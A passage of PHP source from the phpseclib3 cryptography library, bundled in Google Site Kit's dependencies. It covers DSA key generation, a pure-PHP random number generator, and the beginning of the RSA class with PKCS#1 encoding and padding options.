\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomPrime($N); $divisor = $q->multiply($two); do { $x = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::random($L); list(, $c) = $x->divide($divisor); $p = $x->subtract($c->subtract(self::$one)); } while ($p->getLength() != $L || !$p->isPrime()); $p_1 = $p->subtract(self::$one); list($e) = $p_1->divide($q); // quoting http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-4.pdf#page=50 , // "h could be obtained from a random number generator or from a counter that // changes after each use". PuTTY (sshdssg.c) starts h off at 1 and increments // it on each loop. wikipedia says "commonly h = 2 is used" so we'll just do that $h = clone $two; while (\true) { $g = $h->powMod($e, $p); if (!$g->equals(self::$one)) { break; } $h = $h->add(self::$one); } $dsa = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Parameters(); $dsa->p = $p; $dsa->q = $q; $dsa->g = $g; return $dsa; } /** * Create public / private key pair. * * This method is a bit polymorphic. It can take a DSA/Parameters object, L / N as two distinct parameters or * no parameters (at which point L and N will be generated with this method) * * Returns the private key, from which the publickey can be extracted * * @param int[] ...$args * @return PrivateKey */ public static function createKey(...$args) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createKey() should not be called from final classes (' . static::class . ')'); } if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } if (\count($args) == 2 && \is_int($args[0]) && \is_int($args[1])) { $params = self::createParameters($args[0], $args[1]); } elseif (\count($args) == 1 && $args[0] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Parameters) { $params = $args[0]; } elseif (!\count($args)) { $params = self::createParameters(); } else { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Valid parameters are either two integers (L and N), a single DSA object or no parameters at all.'); } $private = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\PrivateKey(); $private->p = $params->p; $private->q = $params->q; $private->g = $params->g; $private->x = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRange(self::$one, $private->q->subtract(self::$one)); $private->y = $private->g->powMod($private->x, $private->p); //$public = clone $private; //unset($public->x); return $private->withHash($params->hash->getHash())->withSignatureFormat($params->shortFormat); } /** * OnLoad Handler * * @return bool */ protected static function onLoad(array $components) { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } if (!isset($components['x']) && !isset($components['y'])) { $new = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Parameters(); } elseif (isset($components['x'])) { $new = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\PrivateKey(); $new->x = $components['x']; } else { $new = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\PublicKey(); } $new->p = $components['p']; $new->q = $components['q']; $new->g = $components['g']; if (isset($components['y'])) { $new->y = $components['y']; } return $new; } /** * Constructor * * PublicKey and PrivateKey objects can only be created from abstract RSA class */ protected function __construct() { $this->sigFormat = self::validatePlugin('Signature', 'ASN1'); $this->shortFormat = 'ASN1'; parent::__construct(); } /** * Returns the key size * * More specifically, this L (the length of DSA Prime P) and N (the length of DSA Group Order q) * * @return array */ public function getLength() { return ['L' => $this->p->getLength(), 'N' => $this->q->getLength()]; } /** * Returns the current engine being used * * @see self::useInternalEngine() * @see self::useBestEngine() * @return string */ public function getEngine() { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } return self::$engines['OpenSSL'] && \in_array($this->hash->getHash(), \openssl_get_md_methods()) ? 'OpenSSL' : 'PHP'; } /** * Returns the parameters * * A public / private key is only returned if the currently loaded "key" contains an x or y * value. * * @see self::getPublicKey() * @return mixed */ public function getParameters() { $type = self::validatePlugin('Keys', 'PKCS1', 'saveParameters'); $key = $type::saveParameters($this->p, $this->q, $this->g); return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA::load($key, 'PKCS1')->withHash($this->hash->getHash())->withSignatureFormat($this->shortFormat); } /** * Determines the signature padding mode * * Valid values are: ASN1, SSH2, Raw * * @param string $format */ public function withSignatureFormat($format) { $new = clone $this; $new->shortFormat = $format; $new->sigFormat = self::validatePlugin('Signature', $format); return $new; } /** * Returns the signature format currently being used * */ public function getSignatureFormat() { return $this->shortFormat; } } <?php /** * Random Number Generator * * PHP version 5 * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * echo bin2hex(\phpseclib3\Crypt\Random::string(8)); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; /** * Pure-PHP Random Number Generator * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Random { /** * Generate a random string. * * Although microoptimizations are generally discouraged as they impair readability this function is ripe with * microoptimizations because this function has the potential of being called a huge number of times. * eg. for RSA key generation. * * @param int $length * @throws \RuntimeException if a symmetric cipher is needed but not loaded * @return string */ public static function string($length) { if (!$length) { return ''; } try { return \random_bytes($length); } catch (\Exception $e) { // random_compat will throw an Exception, which in PHP 5 does not implement Throwable } catch (\Throwable $e) { // If a sufficient source of randomness is unavailable, random_bytes() will throw an // object that implements the Throwable interface (Exception, TypeError, Error). // We don't actually need to do anything here. The string() method should just continue // as normal. Note, however, that if we don't have a sufficient source of randomness for // random_bytes(), most of the other calls here will fail too, so we'll end up using // the PHP implementation. } // at this point we have no choice but to use a pure-PHP CSPRNG // cascade entropy across multiple PHP instances by fixing the session and collecting all // environmental variables, including the previous session data and the current session // data. // // mt_rand seeds itself by looking at the PID and the time, both of which are (relatively) // easy to guess at. linux uses mouse clicks, keyboard timings, etc, as entropy sources, but // PHP isn't low level to be able to use those as sources and on a web server there's not likely // going to be a ton of keyboard or mouse action. web servers do have one thing that we can use // however, a ton of people visiting the website. obviously you don't want to base your seeding // solely on parameters a potential attacker sends but (1) not everything in $_SERVER is controlled // by the user and (2) this isn't just looking at the data sent by the current user - it's based // on the data sent by all users. one user requests the page and a hash of their info is saved. // another user visits the page and the serialization of their data is utilized along with the // server environment stuff and a hash of the previous http request data (which itself utilizes // a hash of the session data before that). certainly an attacker should be assumed to have // full control over his own http requests. he, however, is not going to have control over // everyone's http requests. static $crypto = \false, $v; if ($crypto === \false) { // save old session data $old_session_id = \session_id(); $old_use_cookies = \ini_get('session.use_cookies'); $old_session_cache_limiter = \session_cache_limiter(); $_OLD_SESSION = isset($_SESSION) ? $_SESSION : \false; if ($old_session_id != '') { \session_write_close(); } \session_id(1); \ini_set('session.use_cookies', 0); \session_cache_limiter(''); \session_start(); $v = (isset($_SERVER) ? self::safe_serialize($_SERVER) : '') . (isset($_POST) ? self::safe_serialize($_POST) : '') . (isset($_GET) ? self::safe_serialize($_GET) : '') . (isset($_COOKIE) ? self::safe_serialize($_COOKIE) : '') . (\version_compare(\PHP_VERSION, '8.1.0', '>=') ? \serialize($GLOBALS) : self::safe_serialize($GLOBALS)) . self::safe_serialize($_SESSION) . self::safe_serialize($_OLD_SESSION); $v = $seed = $_SESSION['seed'] = \sha1($v, \true); if (!isset($_SESSION['count'])) { $_SESSION['count'] = 0; } $_SESSION['count']++; \session_write_close(); // restore old session data if ($old_session_id != '') { \session_id($old_session_id); \session_start(); \ini_set('session.use_cookies', $old_use_cookies); \session_cache_limiter($old_session_cache_limiter); } else { if ($_OLD_SESSION !== \false) { $_SESSION = $_OLD_SESSION; unset($_OLD_SESSION); } else { unset($_SESSION); } } // in SSH2 a shared secret and an exchange hash are generated through the key exchange process. // the IV client to server is the hash of that "nonce" with the letter A and for the encryption key it's the letter C. // if the hash doesn't produce enough a key or an IV that's long enough concat successive hashes of the // original hash and the current hash. we'll be emulating that. for more info see the following URL: // // http://tools.ietf.org/html/rfc4253#section-7.2 // // see the is_string($crypto) part for an example of how to expand the keys $key = \sha1($seed . 'A', \true); $iv = \sha1($seed . 'C', \true); // ciphers are used as per the nist.gov link below. also, see this link: // // http://en.wikipedia.org/wiki/Cryptographically_secure_pseudorandom_number_generator#Designs_based_on_cryptographic_primitives switch (\true) { case \class_exists('Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\AES'): $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES('ctr'); break; case \class_exists('Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Twofish'): $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Twofish('ctr'); break; case \class_exists('Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Blowfish'): $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Blowfish('ctr'); break; case \class_exists('Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\TripleDES'): $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES('ctr'); break; case \class_exists('Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DES'): $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES('ctr'); break; case \class_exists('Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\RC4'): $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC4(); break; default: throw new \RuntimeException(__CLASS__ . ' requires at least one symmetric cipher be loaded'); } $crypto->setKey(\substr($key, 0, $crypto->getKeyLength() >> 3)); $crypto->setIV(\substr($iv, 0, $crypto->getBlockLength() >> 3)); $crypto->enableContinuousBuffer(); } //return $crypto->encrypt(str_repeat("\0", $length)); // the following is based off of ANSI X9.31: // // http://csrc.nist.gov/groups/STM/cavp/documents/rng/931rngext.pdf // // OpenSSL uses that same standard for it's random numbers: // // http://www.opensource.apple.com/source/OpenSSL/OpenSSL-38/openssl/fips-1.0/rand/fips_rand.c // (do a search for "ANS X9.31 A.2.4") $result = ''; while (\strlen($result) < $length) { $i = $crypto->encrypt(\microtime()); // strlen(microtime()) == 21 $r = $crypto->encrypt($i ^ $v); // strlen($v) == 20 $v = $crypto->encrypt($r ^ $i); // strlen($r) == 20 $result .= $r; } return \substr($result, 0, $length); } /** * Safely serialize variables * * If a class has a private __sleep() it'll emit a warning * @return mixed * @param mixed $arr */ private static function safe_serialize(&$arr) { if (\is_object($arr)) { return ''; } if (!\is_array($arr)) { return \serialize($arr); } // prevent circular array recursion if (isset($arr['__phpseclib_marker'])) { return ''; } $safearr = []; $arr['__phpseclib_marker'] = \true; foreach (\array_keys($arr) as $key) { // do not recurse on the '__phpseclib_marker' key itself, for smaller memory usage if ($key !== '__phpseclib_marker') { $safearr[$key] = self::safe_serialize($arr[$key]); } } unset($arr['__phpseclib_marker']); return \serialize($safearr); } } <?php /** * Pure-PHP PKCS#1 (v2.1) compliant implementation of RSA. * * PHP version 5 * * Here's an example of how to encrypt and decrypt text with this library: * <code> * <?php * include 'vendor/autoload.php'; * * $private = Crypt\RSA::createKey(); * $public = $private->getPublicKey(); * * $plaintext = 'terrafrost'; * * $ciphertext = $public->encrypt($plaintext); * * echo $private->decrypt($ciphertext); * ?> * </code> * * Here's an example of how to create signatures and verify signatures with this library: * <code> * <?php * include 'vendor/autoload.php'; * * $private = Crypt\RSA::createKey(); * $public = $private->getPublicKey(); * * $plaintext = 'terrafrost'; * * $signature = $private->sign($plaintext); * * echo $public->verify($plaintext, $signature) ? 'verified' : 'unverified'; * ?> * </code> * * One thing to consider when using this: so phpseclib uses PSS mode by default. * Technically, id-RSASSA-PSS has a different key format than rsaEncryption. So * should phpseclib save to the id-RSASSA-PSS format by default or the * rsaEncryption format? For stand-alone keys I figure rsaEncryption is better * because SSH doesn't use PSS and idk how many SSH servers would be able to * decode an id-RSASSA-PSS key. For X.509 certificates the id-RSASSA-PSS * format is used by default (unless you change it up to use PKCS1 instead) * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InconsistentSetupException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Pure-PHP PKCS#1 compliant implementation of RSA. * * @author Jim Wigginton <terrafrost@php.net> */ abstract class RSA extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey { /** * Algorithm Name * * @var string */ const ALGORITHM = 'RSA'; /** * Use {@link http://en.wikipedia.org/wiki/Optimal_Asymmetric_Encryption_Padding Optimal Asymmetric Encryption Padding} * (OAEP) for encryption / decryption. * * Uses sha256 by default * * @see self::setHash() * @see self::setMGFHash() * @see self::encrypt() * @see self::decrypt() */ const ENCRYPTION_OAEP = 1; /** * Use PKCS#1 padding. * * Although self::PADDING_OAEP / self::PADDING_PSS offers more security, including PKCS#1 padding is necessary for purposes of backwards * compatibility with protocols (like SSH-1) written before OAEP's introduction. * * @see self::encrypt() * @see self::decrypt() */ const ENCRYPTION_PKCS1 = 2; /** * Do not use any padding * * Although this method is not recommended it can none-the-less sometimes be useful if you're trying to decrypt some legacy * stuff, if you're trying to diagnose why an encrypted message isn't decrypting, etc. * * @see self::encrypt() * @see self::decrypt() */ const ENCRYPTION_NONE = 4; /** * Use the Probabilistic Signature Scheme for signing * * Uses sha256 and 0 as the salt length * * @see self::setSaltLength() * @see self::setMGFHash() * @see self::setHash() * @see self::sign() * @see self::verify() * @see self::setHash() */ const SIGNATURE_PSS = 16; /** * Use a relaxed version of PKCS#1 padding for signature verification * * @see self::sign() * @see self::verify() * @see self::setHash() */ const SIGNATURE_RELAXED_PKCS1 = 32; /** * Use PKCS#1 padding for signature verification * * @see self::sign() * @see self::verify() * @see self::setHash() */ const SIGNATURE_PKCS1 = 64; /** * Encryption padding mode * * @var int */ protected $encryptionPadding = self::ENCRYPTION_OAEP; /** * Signature padding mode * * @var int */ protected $signaturePadding = self::SIGNATURE_PSS; /** * Length of hash function output * * @var int */ protected $hLen; /** * Length of salt * * @var int */ protected $sLen; /** * Label * * @var string */ protected $label = ''; /** * Hash function for the Mask Generation Function * * @var Hash */ protected $mgfHash; /** * Length of MGF hash function output * * @var int */ protected $mgfHLen; /** * Modulus (ie. n) * * @var Math\BigInteger */ protected $modulus; /** * Modulus length * * @var Math\BigInteger */ protected $k; /** * Exponent (ie. e or d) * * @var Math\BigInteger */ protected $exponent; /** * Default public exponent * * @var int * @link http://en.wikipedia.org/wiki/65537_%28number%29 */ private static $defaultExponent = 65537; /** * Enable Blinding? * * @var bool */ protected static $enableBlinding = \true; /** * OpenSSL configuration file name. * * @see self::createKey() * @var ?string */ protected static $configFile; /** * Smallest Prime * * Per <http://cseweb.ucsd.edu/~hovav/dist/survey.pdf#page=5>, this number ought not result in primes smaller * than 256 bits. As a consequence if the key you're trying to create is 1024 bits and you've set smallestPrime * to 384 bits then you're going to get a 384 bit prime and a 640 bit prime (384 + 1024 % 384). At least if * engine is set to self::ENGINE_INTERNAL. If Engine is set to self::ENGINE_OPENSSL then smallest Prime is * ignored (ie. multi-prime RSA support is more intended as a way to speed up RSA key generation when there's * a chance neither gmp nor OpenSSL are installed) * * @var int */ private static $smallestPrime = 4096; /** * Public Exponent * * @var Math\BigInteger */ protected $publicExponent; /** * Sets the public exponent for key generation * * This will be 65537 unless changed. * * @param int $val */ public static function setExponent($val) { self::$defaultExponent = $val; } /** * Sets the smallest prime number in bits. Used for key generation * * This will be 4096 unless changed. * * @param int $val */ public static function setSmallestPrime($val) { self::$smallestPrime = $val; } /** * Sets the OpenSSL config file path * * Set to the empty string to use the default config file * * @param string $val */ public static function setOpenSSLConfigPath($val) { self::$configFile = $val; } /** * Create a private key * * The public key can be extracted from the private key * * @return PrivateKey * @param int $bits */ public static function createKey($bits = 2048) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createKey() should not be called from final classes (' . static::class . ')'); } $regSize = $bits >> 1; // divide by two to see how many bits P and Q would be if ($regSize > self::$smallestPrime) { $num_primes = \floor($bits / self::$smallestPrime); $regSize = self::$smallestPrime; } else { $num_primes = 2; } if ($num_primes == 2 && $bits >= 384 && self::$defaultExponent == 65537) { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } // OpenSSL uses 65537 as the exponent and requires RSA keys be 384 bits minimum if (self::$engines['OpenSSL']) { $config = []; if (self::$configFile) { $config['config'] = self::$configFile; } $rsa = \openssl_pkey_new(['private_key_bits' => $bits] + $config); \openssl_pkey_export($rsa, $privatekeystr, null, $config); // clear the buffer of error strings stemming from a minimalistic openssl.cnf // https://github.com/php/php-src/issues/11054 talks about other errors this'll pick up while (\openssl_error_string() !== \false) { } return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::load($privatekeystr); } } static $e; if (!isset($e)) { $e = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(self::$defaultExponent); } $n = clone self::$one; $exponents = $coefficients = $primes = []; $lcm = ['top' => clone self::$one, 'bottom' => \false]; do { for ($i = 1; $i <= $num_primes; $i++) { if ($i != $num_primes) { $primes[$i] = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomPrime($regSize); } else { \extract(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::minMaxBits($bits)); /** @var BigInteger $min * @var BigInteger $max */ list($min) = $min->divide($n); $min = $min->add(self::$one); list($max) = $max->divide($n); $primes[$i] = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRangePrime($min, $max); } // the first coefficient is calculated differently from the rest // ie. instead of being $primes[1]->modInverse($primes[2]), it's $primes[2]->modInverse($primes[1]) if ($i > 2) { $coefficients[$i] = $n->modInverse($primes[$i]); } $n = $n->multiply($primes[$i]); $temp = $primes[$i]->subtract(self::$one); // textbook RSA implementations use Euler's totient function instead of the least common multiple. // see http://en.wikipedia.org/wiki/Euler%27s_totient_function $lcm['top'] = $lcm['top']->multiply($temp); $lcm['bottom'] = $lcm['bottom'] === \false ? $temp : $lcm['bottom']->gcd($temp); } list($temp) = $lcm['top']->divide($lcm['bottom']); $gcd = $temp->gcd($e); $i0 = 1; } while (!$gcd->equals(self::$one)); $coefficients[2] = $primes[2]->modInverse($primes[1]); $d = $e->modInverse($temp); foreach ($primes as $i => $prime) { $temp = $prime->subtract(self::$one); $exponents[$i] = $e->modInverse($temp); } // from <http://tools.ietf.org/html/rfc3447#appendix-A.1.2>: // RSAPrivateKey ::= SEQUENCE { // version Version, // modulus INTEGER, -- n // publicExponent INTEGER, -- e // privateExponent INTEGER, -- d // prime1 INTEGER, -- p // prime2 INTEGER, -- q // exponent1 INTEGER, -- d mod (p-1) // exponent2 INTEGER, -- d mod (q-1) // coefficient INTEGER, -- (inverse of q) mod p // otherPrimeInfos OtherPrimeInfos OPTIONAL // } $privatekey = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\PrivateKey(); $privatekey->modulus = $n; $privatekey->k = $bits >> 3; $privatekey->publicExponent = $e; $privatekey->exponent = $d; $privatekey->primes = $primes; $privatekey->exponents = $exponents; $privatekey->coefficients = $coefficients; /* $publickey = new PublicKey; $publickey->modulus = $n; $publickey->k = $bits >> 3; $publickey->exponent = $e; $publickey->publicExponent = $e; $publickey->isPublic = true; */ return $privatekey; } /** * OnLoad Handler * * @return bool */ protected static function onLoad(array $components) { $key = $components['isPublicKey'] ? new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\PublicKey() : new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\PrivateKey(); $key->modulus = $components['modulus']; $key->publicExponent = $components['publicExponent']; $key->k = $key->modulus->getLengthInBytes(); if ($components['isPublicKey'] || !isset($components['privateExponent'])) { $key->exponent = $key->publicExponent; } else { $key->privateExponent = $components['privateExponent']; $key->exponent = $key->privateExponent; $key->primes = $components['primes']; $key->exponents = $components['exponents']; $key->coefficients = $components['coefficients']; } if ($components['format'] == \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS::class) { // in the X509 world RSA keys are assumed to use PKCS1 padding by default. only if the key is // explicitly a PSS key is the use of PSS assumed. phpseclib does not work like this. phpseclib // uses PSS padding by default. it assumes the more secure method by default and altho it provides // for the less secure PKCS1 method you have to go out of your way to use it. this is consistent // with the latest trends in crypto. libsodium (NaCl) is actually a little more extreme in that // not only does it defaults to the most secure methods - it doesn't even let you choose less // secure methods //$key = $key->withPadding(self::SIGNATURE_PSS); if (isset($components['hash'])) { $key = $key->withHash($components['hash']); } if (isset($components['MGFHash'])) { $key = $key->withMGFHash($components['MGFHash']); } if (isset($components['saltLength'])) { $key = $key->withSaltLength($components['saltLength']); } } return $key; } /** * Initialize static variables */ protected static function initialize_static_variables() { if (!isset(self::$configFile)) { self::$configFile = \dirname(__FILE__) . '/../openssl.cnf'; } parent::initialize_static_variables(); } /** * Constructor * * PublicKey and PrivateKey objects can only be created from abstract RSA class */ protected function __construct() { parent::__construct(); $this->hLen = $this->hash->getLengthInBytes(); $this->mgfHash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'); $this->mgfHLen = $this->mgfHash->getLengthInBytes(); } /** * Integer-to-Octet-String primitive * * See {@link http://tools.ietf.org/html/rfc3447#section-4.1 RFC3447#section-4.1}. * * @param bool|Math\BigInteger $x * @param int $xLen * @return bool|string */ protected function i2osp($x, $xLen) { if ($x === \false) { return \false; } $x = $x->toBytes(); if (\strlen($x) > $xLen) { throw new \OutOfRangeException('Resultant string length out of range'); } return \str_pad($x, $xLen, \chr(0), \STR_PAD_LEFT); } /** * Octet-String-to-Integer primitive * * See {@link http://tools.ietf.org/html/rfc3447#section-4.2 RFC3447#section-4.2}. * * @param string $x * @return Math\BigInteger */ protected function os2ip($x) { return new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($x, 256); } /** * EMSA-PKCS1-V1_5-ENCODE * * See {@link http://tools.ietf.org/html/rfc3447#section-9.2 RFC3447#section-9.2}. * * @param string $m * @param int $emLen * @throws \LengthException if the intended encoded message length is too short * @return string */ protected function emsa_pkcs1_v1_5_encode($m, $emLen) { $h = $this->hash->hash($m); // see http://tools.ietf.org/html/rfc3447#page-43 switch ($this->hash->getHash()) { case 'md2': $t = "0 0\f\x06\x08*\x86H\x86\xf7\r\x02\x02\x05\x00\x04\x10"; break; case 'md5': $t = "0 0\f\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x00\x04\x10"; break; case 'sha1': $t = "0!0\t\x06\x05+\x0e\x03\x02\x1a\x05\x00\x04\x14"; break; case 'sha256': $t = "010\r\x06\t`\x86H\x01e\x03\x04\x02\x01\x05\x00\x04 "; break; case 'sha384': $t = "0A0\r\x06\t`\x86H\x01e\x03\x04\x02\x02\x05\x00\x040"; break; case 'sha512': $t = "0Q0\r\x06\t`\x86H\x01e\x03\x04\x02\x03\x05\x00\x04@"; break; // from https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf#page=40 case 'sha224': $t = "0-0\r\x06\t`\x86H\x01e\x03\x04\x02\x04\x05\x00\x04\x1c"; break; case 'sha512/224': $t = "0-0\r\x06\t`\x86H\x01e\x03\x04\x02\x05\x05\x00\x04\x1c"; break; case 'sha512/256': $t = "010\r\x06\t`\x86H\x01e\x03\x04\x02\x06\x05\x00\x04 "; } $t .= $h; $tLen = \strlen($t); if ($emLen < $tLen + 11) { throw new \LengthException('Intended encoded message length too short'); } $ps = \str_repeat(\chr(0xff), $emLen - $tLen - 3); $em = "\x00\x01{$ps}\x00{$t}"; return $em; } /** * EMSA-PKCS1-V1_5-ENCODE (without NULL) * * Quoting https://tools.ietf.org/html/rfc8017#page-65, * * "The parameters field associated with id-sha1, id-sha224, id-sha256, * id-sha384, id-sha512, id-sha512/224, and id-sha512/256 should * generally be omitted, but if present, it shall have a value of type * NULL" * * @param string $m * @param int $emLen * @return string */ protected function emsa_pkcs1_v1_5_encode_without_null($m, $emLen) { $h = $this->hash->hash($m); // see http://tools.ietf.org/html/rfc3447#page-43 switch ($this->hash->getHash()) { case 'sha1': $t = "0\x1f0\x07\x06\x05+\x0e\x03\x02\x1a\x04\x14"; break; case 'sha256': $t = "0/0\v\x06\t`\x86H\x01e\x03\x04\x02\x01\x04 "; break; case 'sha384': $t = "0?0\v\x06\t`\x86H\x01e\x03\x04\x02\x02\x040"; break; case 'sha512': $t = "0O0\v\x06\t`\x86H\x01e\x03\x04\x02\x03\x04@"; break; // from https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf#page=40 case 'sha224': $t = "0+0\v\x06\t`\x86H\x01e\x03\x04\x02\x04\x04\x1c"; break; case 'sha512/224': $t = "0+0\v\x06\t`\x86H\x01e\x03\x04\x02\x05\x04\x1c"; break; case 'sha512/256': $t = "0/0\v\x06\t`\x86H\x01e\x03\x04\x02\x06\x04 "; break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('md2 and md5 require NULLs'); } $t .= $h; $tLen = \strlen($t); if ($emLen < $tLen + 11) { throw new \LengthException('Intended encoded message length too short'); } $ps = \str_repeat(\chr(0xff), $emLen - $tLen - 3); $em = "\x00\x01{$ps}\x00{$t}"; return $em; } /** * MGF1 * * See {@link http://tools.ietf.org/html/rfc3447#appendix-B.2.1 RFC3447#appendix-B.2.1}. * * @param string $mgfSeed * @param int $maskLen * @return string */ protected function mgf1($mgfSeed, $maskLen) { // if $maskLen would yield strings larger than 4GB, PKCS#1 suggests a "Mask too long" error be output. $t = ''; $count = \ceil($maskLen / $this->mgfHLen); for ($i = 0; $i < $count; $i++) { $c = \pack('N', $i); $t .= $this->mgfHash->hash($mgfSeed . $c); } return \substr($t, 0, $maskLen); } /** * Returns the key size * * More specifically, this returns the size of the modulo in bits. * * @return int */ public function getLength() { return !isset($this->modulus) ? 0 : $this->modulus->getLength(); } /** * Determines which hashing function should be used * * Used with signature production / verification and (if the encryption mode is self::PADDING_OAEP) encryption and * decryption. * * @param string $hash */ public function withHash($hash) { $new = clone $this; // Crypt\Hash supports algorithms that PKCS#1 doesn't support. md5-96 and sha1-96, for example. switch (\strtolower($hash)) { case 'md2': case 'md5': case 'sha1': case 'sha256': case 'sha384': case 'sha512': case 'sha224': case 'sha512/224': case 'sha512/256': $new->hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash($hash); break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported hash algorithms are: md2, md5, sha1, sha256, sha384, sha512, sha224, sha512/224, sha512/256'); } $new->hLen = $new->hash->getLengthInBytes(); return $new; } /** * Determines which hashing function should be used for the mask generation function * * The mask generation function is used by self::PADDING_OAEP and self::PADDING_PSS and although it's * best if Hash and MGFHash are set to the same thing this is not a requirement. * * @param string $hash */ public function withMGFHash($hash) { $new = clone $this; // Crypt\Hash supports algorithms that PKCS#1 doesn't support. md5-96 and sha1-96, for example. switch (\strtolower($hash)) { case 'md2': case 'md5': case 'sha1': case 'sha256': case 'sha384': case 'sha512': case 'sha224': case 'sha512/224': case 'sha512/256': $new->mgfHash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash($hash); break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported hash algorithms are: md2, md5, sha1, sha256, sha384, sha512, sha224, sha512/224, sha512/256'); } $new->mgfHLen = $new->mgfHash->getLengthInBytes(); return $new; } /** * Returns the MGF hash algorithm currently being used * */ public function getMGFHash() { return clone $this->mgfHash; } /** * Determines the salt length * * Used by RSA::PADDING_PSS * * To quote from {@link http://tools.ietf.org/html/rfc3447#page-38 RFC3447#page-38}: * * Typical salt lengths in octets are hLen (the length of the output * of the hash function Hash) and 0. * * @param int $sLen */ public function withSaltLength($sLen) { $new = clone $this; $new->sLen = $sLen; return $new; } /** * Returns the salt length currently being used * */ public function getSaltLength() { return $this->sLen !== null ? $this->sLen : $this->hLen; } /** * Determines the label * * Used by RSA::PADDING_OAEP * * To quote from {@link http://tools.ietf.org/html/rfc3447#page-17 RFC3447#page-17}: * * Both the encryption and the decryption operations of RSAES-OAEP take * the value of a label L as input. In this version of PKCS #1, L is * the empty string; other uses of the label are outside the scope of * this document. * * @param string $label */ public function withLabel($label) { $new = clone $this; $new->label = $label; return $new; } /** * Returns the label currently being used * */ public function getLabel() { return $this->label; } /** * Determines the padding modes * * Example: $key->withPadding(RSA::ENCRYPTION_PKCS1 | RSA::SIGNATURE_PKCS1); * * @param int $padding */ public function withPadding($padding) { $masks = [self::ENCRYPTION_OAEP, self::ENCRYPTION_PKCS1, self::ENCRYPTION_NONE]; $encryptedCount = 0; $selected = 0; foreach ($masks as $mask) { if ($padding & $mask) { $selected = $mask; $encryptedCount++; } } if ($encryptedCount > 1) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InconsistentSetupException('Multiple encryption padding modes have been selected; at most only one should be selected'); } $encryptionPadding = $selected; $masks = [self::SIGNATURE_PSS, self::SIGNATURE_RELAXED_PKCS1, self::SIGNATURE_PKCS1]; $signatureCount = 0; $selected = 0; foreach ($masks as $mask) { if ($padding & $mask) { $selected = $mask; $signatureCount++; } } if ($signatureCount > 1) { throw new 